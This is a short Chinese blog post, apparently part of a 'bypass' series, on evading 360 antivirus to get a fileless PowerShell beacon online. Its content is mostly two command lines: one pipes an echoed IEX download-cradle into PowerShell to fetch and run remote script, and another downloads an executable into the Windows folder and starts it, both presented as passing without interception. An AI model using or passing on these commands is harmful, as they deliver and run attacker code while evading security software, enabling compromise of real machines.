bypass系列-绕过360无文件Powershell上线

白色键盘 2.6K 0

选择脚本传递
bypass系列-绕过360无文件Powershell上线

选择powershell和填选端口

bypass系列-绕过360无文件Powershell上线

复制生成的powershell一句话上线,正常执行

bypass系列-绕过360无文件Powershell上线

bypass系列-绕过360无文件Powershell上线

bypass系列-绕过360无文件Powershell上线

bypass系列-绕过360无文件Powershell上线
使用echo输出,管道符调用powershell

cmd /c echo IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:7788/a')) | powershell -

无拦截上线

bypass系列-绕过360无文件Powershell上线

同理绕过

echo (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/test.exe','c:\windows\test.exe');start-process 'c:\windows\test.exe' | powershell -

本文作者为白色键盘,转载请注明。

发表评论 取消回复
表情 图片 链接 代码

分享